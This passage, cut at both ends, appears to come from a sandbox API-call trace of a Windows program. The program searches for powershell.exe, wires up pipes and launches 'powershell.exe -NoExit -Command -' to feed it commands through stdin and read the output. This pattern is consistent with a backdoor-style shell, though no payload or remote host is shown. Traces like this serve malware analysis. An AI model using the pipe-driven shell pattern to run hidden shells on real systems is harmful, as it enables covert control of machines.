lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.771] CreateFileW (lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.com" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0053.771] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.exe" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.771] CreateFileW (lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.exe" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0053.771] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.bat" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.771] CreateFileW (lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.bat" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0053.771] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.cmd" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.772] CreateFileW (lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.cmd" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0053.772] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.vbs" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.772] CreateFileW (lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.vbs" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0053.772] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.vbe" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.772] CreateFileW (lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.vbe" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0053.772] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.js" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.js"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.772] CreateFileW (lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.js" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0053.772] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.jse" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.772] CreateFileW (lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.jse" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0053.772] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.wsf" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.772] CreateFileW (lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.wsf" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0053.772] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.wsh" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.772] CreateFileW (lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.wsh" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0053.772] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.msc" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.773] CreateFileW (lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.msc" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0053.773] VirtualAlloc (lpAddress=0xc000150000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000150000 [0053.773] VirtualAlloc (lpAddress=0xc000152000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000152000 [0053.773] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1 [0053.776] VirtualAlloc (lpAddress=0xc00003c000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00003c000 [0053.776] GetProcAddress (hModule=0x77940000, lpProcName="CreatePipe") returned 0x77944a10 [0053.776] CreatePipe (in: hReadPipe=0xc0000cb9a0, hWritePipe=0xc0000cb9a8, lpPipeAttributes=0x0, nSize=0x0 | out: hReadPipe=0xc0000cb9a0*=0xcc, hWritePipe=0xc0000cb9a8*=0xd0) returned 1 [0053.776] VirtualAlloc (lpAddress=0xc00003e000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00003e000 [0053.777] VirtualAlloc (lpAddress=0xc000040000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000040000 [0053.777] CreatePipe (in: hReadPipe=0xc0000cb9a8, hWritePipe=0xc0000cb9b0, lpPipeAttributes=0x0, nSize=0x0 | out: hReadPipe=0xc0000cb9a8*=0xd4, hWritePipe=0xc0000cb9b0*=0xd8) returned 1 [0053.777] CreatePipe (in: hReadPipe=0xc0000cb9a8, hWritePipe=0xc0000cb9b0, lpPipeAttributes=0x0, nSize=0x0 | out: hReadPipe=0xc0000cb9a8*=0xdc, hWritePipe=0xc0000cb9b0*=0xe0) returned 1 [0053.777] VirtualAlloc (lpAddress=0xc000042000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000042000 [0053.778] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xc000042000, nSize=0x64 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0053.778] VirtualAlloc (lpAddress=0xc000044000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000044000 [0053.778] VirtualAlloc (lpAddress=0xc000046000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000046000 [0053.778] VirtualAlloc (lpAddress=0xc000048000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000048000 [0053.779] VirtualAlloc (lpAddress=0xc00004a000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00004a000 [0053.779] VirtualAlloc (lpAddress=0xc00004c000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00004c000 [0053.779] VirtualAlloc (lpAddress=0xc00004e000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00004e000 [0053.780] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb350 | out: lpFileInformation=0xc0000cb350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1 [0053.780] GetProcAddress (hModule=0x77940000, lpProcName="GetEnvironmentStringsW") returned 0x77956d00 [0053.780] GetEnvironmentStringsW () returned 0x801240* [0053.780] VirtualAlloc (lpAddress=0xc000050000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000050000 [0053.780] VirtualAlloc (lpAddress=0xc000052000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000052000 [0053.781] VirtualAlloc (lpAddress=0xc000054000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000054000 [0053.781] VirtualAlloc (lpAddress=0xc000056000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000056000 [0053.781] VirtualAlloc (lpAddress=0xc000058000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000058000 [0053.781] VirtualAlloc (lpAddress=0xc00005a000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00005a000 [0053.782] VirtualAlloc (lpAddress=0xc00005c000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00005c000 [0053.782] GetProcAddress (hModule=0x77940000, lpProcName="FreeEnvironmentStringsW") returned 0x77956d20 [0053.782] FreeEnvironmentStringsW (penv=0x801240) returned 1 [0053.782] VirtualAlloc (lpAddress=0xc00005e000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00005e000 [0053.783] GetProcAddress (hModule=0x77940000, lpProcName="GetCurrentProcess") returned 0x77955cf0 [0053.783] GetCurrentProcess () returned 0xffffffffffffffff [0053.783] GetProcAddress (hModule=0x77940000, lpProcName="DuplicateHandle") returned 0x77955d10 [0053.783] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0xcc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xc00000e600, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0xc00000e600*=0xe4) returned 1 [0053.784] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0xd8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xc00000e608, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0xc00000e608*=0xe8) returned 1 [0053.784] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0xe0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xc00000e610, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0xc00000e610*=0xec) returned 1 [0053.784] VirtualAlloc (lpAddress=0xc000154000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000154000 [0053.784] VirtualAlloc (lpAddress=0xc000158000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000158000 [0053.784] GetProcAddress (hModule=0x77940000, lpProcName="CreateProcessW") returned 0x77961bb0 [0053.784] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpCommandLine="powershell.exe -NoExit -Command -", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x400, lpEnvironment=0xc000158000, lpCurrentDirectory=0x0, lpStartupInfo=0xc0000cb728*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xe4, hStdOutput=0xe8, hStdError=0xec), lpProcessInformation=0xc0000cb638 | out: lpCommandLine="powershell.exe -NoExit -Command -", lpProcessInformation=0xc0000cb638*(hProcess=0xfc, hThread=0xf8, dwProcessId=0x5f4, dwThreadId=0x5e4)) returned 1 [0054.061] SetEvent (hEvent=0xf0) returned 1 [0054.061] GetProcAddress (hModule=0x77940000, lpProcName="CloseHandle") returned 0x77962f80 [0054.061] CloseHandle (hObject=0xf8) returned 1 [0054.061] CloseHandle (hObject=0xec) returned 1 [0054.061] CloseHandle (hObject=0xe8) returned 1 [0054.061] CloseHandle (hObject=0xe4) returned 1 [0054.062] CancelIoEx (hFile=0xcc, lpOverlapped=0x0) returned 0 [0054.062] CloseHandle (hObject=0xcc) returned 1 [0054.062] CancelIoEx (hFile=0xd8, lpOverlapped=0x0) returned 0 [0054.062] CloseHandle (hObject=0xd8) returned 1 [0054.062] CancelIoEx (hFile=0xe0, lpOverlapped=0x0) returned 0 [0054.062] CloseHandle (hObject=0xe0) returned 1 [0054.062] CreateIoCompletionPort (FileHandle=0xffffffffffffffff, ExistingCompletionPort=0x0, CompletionKey=0x0, NumberOfConcurrentThreads=0xffffffff) returned 0xe0 [0054.062] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\advapi32.dll") returned 0x7feff550000 [0054.063] GetProcAddress (hModule=0x7feff550000, lpProcName="CryptAcquireContextW") returned 0x7feff55d98c [0054.063] CryptAcquireContextW (in: phProv=0xc000110028, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xc000110028*=0x8024b0) returned 1 [0054.609] SetEvent (hEvent=0xf0) returned 1 [0054.609] GetProcAddress (hModule=0x7feff550000, lpProcName="CryptGenRandom") returned 0x7feff55dc60 [0054.609] CryptGenRandom (in: hProv=0x8024b0, dwLen=0xc, pbBuffer=0xc000100510 | out: pbBuffer=0xc000100510) returned 1 [0054.610] CryptGenRandom (in: hProv=0x8024b0, dwLen=0xc, pbBuffer=0xc000100530 | out: pbBuffer=0xc000100530) returned 1 [0054.610] VirtualAlloc (lpAddress=0xc00015a000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00015a000 [0054.610] GetProcAddress (hModule=0x77940000, lpProcName="WriteFile") returned 0x779635a0 [0054.610] WriteFile (in: hFile=0xd0, lpBuffer=0xc000152180*, nNumberOfBytesToWrite=0x75, lpNumberOfBytesWritten=0xc0000cb9a4, lpOverlapped=0x0 | out: lpBuffer=0xc000152180*, lpNumberOfBytesWritten=0xc0000cb9a4*=0x75, lpOverlapped=0x0) returned 1 [0054.610] VirtualAlloc (lpAddress=0xc00015c000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00015c000 [0054.611] SetEvent (hEvent=0x90) returned 1 [0054.612] GetProcAddress (hModule=0x77940000, lpProcName="ReadFile") returned 0x77951500 [0054.612] ReadFile (in: hFile=0xdc, lpBuffer=0xc00010e6c0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000163ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00010e6c0*, lpNumberOfBytesRead=0xc000163ddc*=0x21, lpOverlapped=0x0) returned 1 [0082.918] SetEvent (hEvent=0xf0) returned 1 [0082.919] ReadFile (in: hFile=0xdc, lpBuffer=0xc00000c480, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000163ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000c480*, lpNumberOfBytesRead=0xc000163ddc*=0x2, lpOverlapped=0x0) returned 1 [0082.919] ReadFile (in: hFile=0xdc, lpBuffer=0xc00000c4c0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000163ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000c4c0*, lpNumberOfBytesRead=0xc000163ddc*=0x40, lpOverlapped=0x0) returned 1 [0082.973] ReadFile (in: hFile=0xdc, lpBuffer=0xc00000c540, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000163ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000c540*, lpNumberOfBytesRead=0xc000163ddc*=0x5, lpOverlapped=0x0) returned 1 [0082.973] ReadFile (in: hFile=0xdc, lpBuffer=0xc00000c580, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000163ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000c580*, lpNumberOfBytesRead=0xc000163ddc*=0x23, lpOverlapped=0x0) returned 1 [0083.805] SetEvent (hEvent=0xf0) returned 1 [0083.806] SetEvent (hEvent=0x90) returned 1 [0083.806] VirtualAlloc (lpAddress=0xc000062000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000062000 [0083.808] WriteFile (in: hFile=0xd0, lpBuffer=0xc000010168*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0xc0000cba44, lpOverlapped=0x0 | out: lpBuffer=0xc000010168*, lpNumberOfBytesWritten=0xc0000cba44*=0x6, lpOverlapped=0x0) returned 1 [0083.808] CancelIoEx (hFile=0xd0, lpOverlapped=0x0) returned 0 [0083.808] CloseHandle (hObject=0xd0) returned 1 [0083.809] GetProcAddress (hModule=0x77940000, lpProcName="WaitForSingleObject") returned 0x77962b20 [0083.809] WaitForSingleObject (hHandle=0xfc, dwMilliseconds=0xffffffff) returned 0x0 [0084.208] SetEvent (hEvent=0xf0) returned 1 [0084.208] GetProcAddress (hModule=0x77940000, lpProcName="GetExitCodeProcess") returned 0x779512b0 [0084.209] GetExitCodeProcess (in: hProcess=0xfc, lpExitCode=0xc0000cba74 | out: lpExitCode=0xc0000cba74*=0x0) returned 1 [0084.209] GetProcAddress (hModule=0x77940000, lpProcName="GetProcessTimes") returned 0x77944380 [0084.209] GetProcessTimes (in: hProcess=0xfc, lpCreationTime=0xc0000a0120, lpExitTime=0xc0000a0128, lpKernelTime=0xc0000a0130, lpUserTime=0xc0000a0138 | out: lpCreationTime=0xc0000a0120, lpExitTime=0xc0000a0128, lpKernelTime=0xc0000a0130, lpUserTime=0xc0000a0138) returned 1 [0084.209] CloseHandle (hObject=0xfc) returned 1 [0084.209] VirtualAlloc (lpAddress=0xc0000cc000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000cc000 [0084.209] VirtualAlloc (lpAddress=0xc0000ce000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000ce000 [0084.210] PostQueuedCompletionStatus (CompletionPort=0xe0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x0) returned 1 [0084.210] PostQueuedCompletionStatus (CompletionPort=0xe0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x0) returned 1 [0084.210] WaitForSingleObject (hHandle=0x84, dwMilliseconds=0xffffffff) returned 0x0 [0084.224] WaitForSingleObject (hHandle=0x84, dwMilliseconds=0xffffffff) returned 0x0 [0084.242] WaitForSingleObject (hHandle=0x84, dwMilliseconds=0xffffffff) returned 0x0 [0084.250] WaitForSingleObject (hHandle=0x84, dwMilliseconds=0xffffffff) returned 0x0 [0084.254] WaitForSingleObject (hHandle=0x84, dwMilliseconds=0xffffffff) returned 0x0 [0084.266] SetEvent (hEvent=0xec) returned 1 [0084.266] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000c600, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000c600*, lpNumberOfBytesRead=0xc000027ddc*=0x40, lpOverlapped=0x0) returned 1 [0113.123] SetEvent (hEvent=0xf0) returned 1 [0113.130] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000c680, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000c680*, lpNumberOfBytesRead=0xc000027ddc*=0x28, lpOverlapped=0x0) returned 1 [0113.130] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000c6c0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000c6c0*, lpNumberOfBytesRead=0xc000027ddc*=0x20, lpOverlapped=0x0) returned 1 [0118.035] SetEvent (hEvent=0xf0) returned 1 [0118.035] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000c700, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000c700*, lpNumberOfBytesRead=0xc000027ddc*=0x40, lpOverlapped=0x0) returned 1 [0118.035] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000c780, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000c780*, lpNumberOfBytesRead=0xc000027ddc*=0x28, lpOverlapped=0x0) returned 1 [0118.035] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000c7c0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000c7c0*, lpNumberOfBytesRead=0xc000027ddc*=0x20, lpOverlapped=0x0) returned 1 [0123.261] SetEvent (hEvent=0xf0) returned 1 [0123.262] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000c800, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000c800*, lpNumberOfBytesRead=0xc000027ddc*=0x40, lpOverlapped=0x0) returned 1 [0123.262] VirtualAlloc (lpAddress=0xc000064000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000064000 [0123.263] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000c880, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000c880*, lpNumberOfBytesRead=0xc000027ddc*=0x28, lpOverlapped=0x0) returned 1 [0123.263] VirtualAlloc (lpAddress=0xc000066000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000066000 [0123.263] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000c8c0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000c8c0*, lpNumberOfBytesRead=0xc000027ddc*=0x20, lpOverlapped=0x0) returned 1 [0127.729] SetEvent (hEvent=0xf0) returned 1 [0127.729] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000c900, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000027ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000c900*, lpNumberOfBytesRead=0xc000027ddc*=0x40, lpOverlapped=0x0) returned 1 [0127.729] VirtualAlloc (lpAddress=0xc000068000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000068000 [0127.729] ReadFile (in: hFile=0xfc, lpBuffer=0xc00000c980, nNumberOfBytesToRead=0x40, 